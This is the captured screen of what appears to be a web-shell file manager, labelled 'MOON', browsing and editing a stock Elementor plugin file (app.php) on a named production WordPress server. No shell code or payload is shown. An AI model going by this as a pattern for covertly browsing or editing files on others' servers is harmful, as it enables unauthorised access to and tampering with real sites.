┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/gshub/wp-content/plugins/elementor/core/app
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: app.php
<?php namespace Elementor\Core\App; use Elementor\Core\Base\App as BaseApp; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * This App class was introduced for backwards compatibility with 3rd parties. */ class App extends BaseApp { const PAGE_ID = 'elementor-app'; public function get_name() { return 'app-bc'; } }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 modules/
DIR
—
2026-05-05 06:08
📄 app.php
PHP
355 B
2026-05-05 06:08
EDIT